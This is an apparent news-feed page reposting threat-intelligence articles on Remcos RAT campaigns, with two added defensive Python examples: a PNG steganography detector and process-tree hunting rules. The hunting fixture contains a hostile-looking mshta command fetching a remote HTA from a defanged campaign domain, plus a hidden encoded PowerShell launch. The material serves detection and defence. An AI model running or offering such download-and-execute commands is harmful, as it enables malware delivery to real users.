Remcos – INDIA NEWS (http://www.indiavpn.org), feed generated Mon, 26 Feb 2024 15:51:06 +0000

New IDAT Loader Attacks Using Steganography to Deploy Remcos RAT
http://www.indiavpn.org/2024/02/26/new-idat-loader-attacks-using-steganography-to-deploy-remcos-rat/
Mon, 26 Feb 2024 15:51:06 +0000

Feb 26, 2024 | The Hacker News | Steganography / Malware

Ukrainian entities based in Finland have been targeted as part of a malicious campaign distributing a commercial remote access trojan known as Remcos RAT using a malware loader called IDAT Loader.

The attack has been attributed to a threat actor tracked by the Computer Emergency Response Team of Ukraine (CERT-UA) under the moniker UAC-0184.

“The attack, as part of the IDAT Loader, used steganography as a technique,” Morphisec researcher Michael Dereviashkin said in a report shared with The Hacker News. “While steganographic, or ‘Stego’ techniques are well-known, it is important to understand their roles in defense evasion, to better understand how to defend against such tactics.”


IDAT Loader, which overlaps with another loader family called Hijack Loader, has been used to serve additional payloads like DanaBot, SystemBC, and RedLine Stealer in recent months. It has also been used by a threat actor tracked as TA544 to distribute Remcos RAT and SystemBC via phishing attacks.

The phishing campaign, first disclosed by CERT-UA in early January 2024, entails using war-themed lures as the starting point of an infection chain that leads to the deployment of IDAT Loader, which, in turn, uses an embedded steganographic PNG to locate and extract Remcos RAT.
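The article does not describe how the payload is hidden inside the PNG, so the following is an added example rather than Morphisec's or the loader's own logic: a generic PNG chunk walker that flags the structural anomalies a payload-carrying image tends to leave behind (a chunk with a bad CRC, IDAT data that is not a zlib stream, bytes left over after the zlib stream inside IDAT, a decompressed size that disagrees with the IHDR geometry, or bytes appended after IEND). The sample images and the "MZ" payload are constructed inline for the demonstration and are not real samples.

```python
"""Added example: walk a PNG's chunks and flag signs of a smuggled payload.

The checks are generic (not tied to any one loader):
  * CRC mismatch on a chunk
  * IDAT data that is not a valid zlib stream
  * bytes left over after the zlib stream ends inside IDAT
  * decompressed size that does not match the IHDR geometry
  * bytes appended after the IEND chunk
"""
import binascii
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
CHANNELS = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}  # PNG colour type -> samples per pixel


def _crc(ctype: bytes, data: bytes) -> int:
    return binascii.crc32(ctype + data) & 0xFFFFFFFF


def make_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one chunk: 4-byte big-endian length, type, data, CRC over type+data."""
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", _crc(ctype, data))


def parse_chunks(blob: bytes):
    """Return (chunks, trailing_bytes); chunks is a list of (type, data, crc_ok) up to IEND."""
    if not blob.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos, chunks = len(PNG_SIG), []
    while pos + 12 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        data = blob[pos + 8:pos + 8 + length]
        crc_field = blob[pos + 8 + length:pos + 12 + length]
        if len(data) != length or len(crc_field) != 4:
            chunks.append((ctype, data, False))  # truncated chunk: treat as bad
            pos = len(blob)
            break
        crc_ok = struct.unpack(">I", crc_field)[0] == _crc(ctype, data)
        chunks.append((ctype, data, crc_ok))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks, len(blob) - pos


def analyse_png(blob: bytes) -> list:
    """Return a list of finding strings; an empty list means nothing looked off."""
    chunks, trailing = parse_chunks(blob)
    findings = []
    if any(not ok for _, _, ok in chunks):
        findings.append("bad_crc")
    if trailing:
        findings.append(f"data_after_iend:{trailing}")
    ihdr = next((d for t, d, _ in chunks if t == b"IHDR"), None)
    idat = b"".join(d for t, d, _ in chunks if t == b"IDAT")
    if ihdr is None or not idat:
        findings.append("missing_ihdr_or_idat")
        return findings
    width, height, depth, colour = struct.unpack(">IIBB", ihdr[:10])
    bits_per_pixel = depth * CHANNELS.get(colour, 0)
    # each scanline is one filter byte followed by the packed pixel bytes
    expected = height * (1 + (width * bits_per_pixel + 7) // 8)
    d = zlib.decompressobj()
    try:
        raw = d.decompress(idat) + d.flush()
    except zlib.error:
        findings.append("idat_not_zlib")
        return findings
    if not d.eof:
        findings.append("idat_zlib_truncated")
    if d.unused_data:  # bytes sitting after the zlib stream inside the IDAT chunks
        findings.append(f"bytes_after_zlib_in_idat:{len(d.unused_data)}")
    if len(raw) != expected:
        findings.append(f"pixel_size_mismatch:{len(raw)}!={expected}")
    return findings


def build_png(width: int, height: int, extra_idat_tail: bytes = b"", after_iend: bytes = b"") -> bytes:
    """Constructed sample: all-black 8-bit RGB image, optionally with smuggled bytes."""
    raw = (b"\x00" + b"\x00" * (width * 3)) * height  # filter type 0 per row
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    idat = zlib.compress(raw) + extra_idat_tail
    return (PNG_SIG + make_chunk(b"IHDR", ihdr) + make_chunk(b"IDAT", idat)
            + make_chunk(b"IEND", b"") + after_iend)


PAYLOAD = b"MZ" + b"\x90" * 64  # constructed stand-in for a smuggled PE, not a real sample

if __name__ == "__main__":
    for name, png in [("clean", build_png(2, 2)),
                      ("after_iend", build_png(2, 2, after_iend=PAYLOAD)),
                      ("in_idat", build_png(2, 2, extra_idat_tail=PAYLOAD))]:
        print(name, analyse_png(png) or "no findings")
```

The size check is the one that survives a careful adversary longest: appending after IEND or after the zlib stream is easy to spot, but a payload compressed into an otherwise valid image only shows up when the decoded scanline bytes do not match what IHDR promises, or when a viewer is asked to render it.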

The development comes as CERT-UA revealed that defense forces in the country have been targeted via the Signal instant messaging app to distribute a booby-trapped Microsoft Excel document that executes COOKBOX, a PowerShell-based malware that’s capable of loading and executing cmdlets. CERT-UA has attributed the activity to a cluster dubbed UAC-0149.


It also follows the resurgence of malware campaigns propagating PikaBot malware since February 8, 2024, using an updated variant that appears to be currently under active development.

“This version of the PIKABOT loader uses a new unpacking method and heavy obfuscation,” Elastic Security Labs said. “The core module has added a new string decryption implementation, changes to obfuscation functionality, and various other modifications.”

Remcos RAT Spreading Through Adult Games in New Attack Wave
http://www.indiavpn.org/2024/01/16/remcos-rat-spreading-through-adult-games-in-new-attack-wave/
Tue, 16 Jan 2024 15:58:54 +0000

Jan 16, 2024 | Newsroom | Botnet / Malware


The remote access trojan (RAT) known as Remcos RAT has been found being propagated via webhards by disguising it as adult-themed games in South Korea.

WebHard, short for web hard drive, is a popular online file storage system used to upload, download, and share files in the country.

While webhards have been used in the past to deliver njRAT, UDP RAT, and DDoS botnet malware, the AhnLab Security Emergency Response Center’s (ASEC) latest analysis shows that the technique has been adopted to distribute Remcos RAT.


In these attacks, users are tricked into opening booby-trapped files by passing them off as adult games, which, when launched, execute malicious Visual Basic scripts in order to run an intermediate binary named “ffmpeg.exe.”

This results in the retrieval of Remcos RAT from an actor-controlled server.


A sophisticated RAT, Remcos (aka Remote Control and Surveillance) facilitates unauthorized remote control and surveillance of compromised hosts, enabling threat actors to exfiltrate sensitive data.

Although originally marketed by the Germany-based firm Breaking Security in 2016 as a bona fide remote administration tool, the malware has become a potent weapon wielded by adversaries to infiltrate systems and establish unfettered control.


“Remcos RAT has evolved into a malicious tool employed by threat actors across various campaigns,” Cyfirma noted in an analysis in August 2023.

“The malware’s multifunctional capabilities, including keylogging, audio recording, screenshot capture, and more, highlight its potential to compromise user privacy, exfiltrate sensitive data, and manipulate systems. The RAT’s ability to disable User Account Control (UAC) and establish persistence further amplifies its potential impact.”

UAC-0050 Group Using New Phishing Tactics to Distribute Remcos RAT
http://www.indiavpn.org/2024/01/04/uac-0050-group-using-new-phishing-tactics-to-distribute-remcos-rat/
Thu, 04 Jan 2024 09:15:15 +0000

Jan 04, 2024 | Newsroom | Software Security / Malware


The threat actor known as UAC-0050 is leveraging phishing attacks to distribute Remcos RAT using new strategies to evade detection from security software.

“The group’s weapon of choice is Remcos RAT, a notorious malware for remote surveillance and control, which has been at the forefront of its espionage arsenal,” Uptycs security researchers Karthick Kumar and Shilpesh Trivedi said in a Wednesday report.

“However, in their latest operational twist, the UAC-0050 group has integrated a pipe method for interprocess communication, showcasing their advanced adaptability.”

UAC-0050, active since 2020, has a history of targeting Ukrainian and Polish entities via social engineering campaigns that impersonate legitimate organizations to trick recipients into opening malicious attachments.


In February 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) attributed a phishing campaign designed to deliver Remcos RAT to the same adversary.

Over the past few months, the same trojan has been distributed as part of at least three different phishing waves, with one such attack also leading to the deployment of an information stealer called Meduza Stealer.

The analysis from Uptycs is based on a LNK file it discovered on December 21, 2023. While the exact initial access vector is currently unknown, it’s suspected to have involved phishing emails targeting Ukrainian military personnel that claim to advertise consultancy roles with the Israel Defense Forces (IDF).


The LNK file in question collects information regarding antivirus products installed on the target computer, and then proceeds to retrieve and execute an HTML application named “6.hta” from a remote server using mshta.exe, a Windows-native binary for running HTA files.

This step paves the way for a PowerShell script that unpacks another PowerShell script to download two files called “word_update.exe” and “ofer.docx” from the domain new-tech-savvy[.]com.

Running word_update.exe causes it to create a copy of itself with the name fmTask_dbg.exe and establish persistence by creating a shortcut to the new executable in the Windows Startup folder.


The binary also employs unnamed pipes to facilitate the exchange of data between itself and a newly spawned child process for cmd.exe in order to ultimately decrypt and launch the Remcos RAT (version 4.9.2 Pro), which is capable of harvesting system data and cookies and login information from web browsers like Internet Explorer, Mozilla Firefox, and Google Chrome.

“Leveraging pipes within the Windows operating system provides a covert channel for data transfer, skillfully evading detection by Endpoint Detection and Response (EDR) and antivirus systems,” the researchers said.

“Although not entirely new, this technique marks a significant leap in the sophistication of the group’s strategies.”
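The chain described above (LNK, then mshta.exe fetching a remote HTA, then PowerShell, then a dropped executable that copies itself, writes a Startup-folder shortcut and drives a cmd.exe child) leaves a recognisable trail in process-creation and file-write telemetry. The following is an added example of how a defender might encode those observations as hunting rules; it is not Uptycs' code or detection content. The event records are constructed for the demonstration: the domain and file names (6.hta, word_update.exe, fmTask_dbg.exe) come from the article, with the domain kept defanged as the report prints it, while the drop path under the user's Temp directory and the process IDs are assumptions. The rules are heuristics and will need tuning against real installers and admin tooling.

```python
"""Added example: hunting rules for the LNK -> mshta -> PowerShell -> Startup chain.

Input is a flat list of process-creation events (with any files the process
wrote); output is a list of (rule_name, pid) hits.  Sample events are
constructed for this demonstration, not taken from a real host.
"""
import re
from dataclasses import dataclass, field


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str                      # full path of the executable
    cmdline: str
    files_written: list = field(default_factory=list)


URL_RE = re.compile(r"https?://", re.I)
STARTUP_LNK_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def hunt(events: list) -> list:
    """Apply each heuristic to every event; return (rule, pid) hits in event order."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        name = basename(e.image)
        # mshta.exe pulling an HTA over the network (the "6.hta" stage)
        if name == "mshta.exe" and URL_RE.search(e.cmdline):
            hits.append(("mshta_remote_hta", e.pid))
        # PowerShell launched by mshta.exe (HTA hands off to a script)
        if name in ("powershell.exe", "pwsh.exe") and parent and basename(parent.image) == "mshta.exe":
            hits.append(("powershell_from_mshta", e.pid))
        # cmd.exe child of a binary living in a user-writable directory
        # (the dropper driving a cmd.exe child over a pipe)
        if name == "cmd.exe" and parent and USER_WRITABLE_RE.search(parent.image):
            hits.append(("cmd_from_user_writable_binary", e.pid))
        for path in e.files_written:
            # persistence via a shortcut in the Startup folder
            if STARTUP_LNK_RE.search(path):
                hits.append(("startup_lnk_written", e.pid))
            # a binary in a user-writable directory writing another .exe (self-copy)
            if USER_WRITABLE_RE.search(e.image) and path.lower().endswith(".exe"):
                hits.append(("exe_dropped_by_user_dir_binary", e.pid))
    return hits


# Constructed sample telemetry; the Temp drop path and PIDs are assumptions.
USER = r"C:\Users\user"
EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://new-tech-savvy[.]com/6.hta"),          # domain defanged as in the report
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -enc ..."),
    ProcEvent(400, 300, USER + r"\AppData\Local\Temp\word_update.exe", "word_update.exe",
              files_written=[USER + r"\AppData\Roaming\fmTask_dbg.exe",
                             USER + r"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fmTask_dbg.lnk"]),
    ProcEvent(500, 400, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    # benign noise: an admin shell and a cmd window opened from Explorer
    ProcEvent(600, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-ChildItem"),
    ProcEvent(700, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
]

if __name__ == "__main__":
    for rule, pid in hunt(EVENTS):
        print(f"{rule:32s} pid={pid}")
```

No single rule here is conclusive on its own (administrators do run mshta and PowerShell), so the value is in correlating hits along one process tree: a host that trips mshta_remote_hta, powershell_from_mshta and startup_lnk_written within minutes of each other is a much stronger signal than any one of them.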
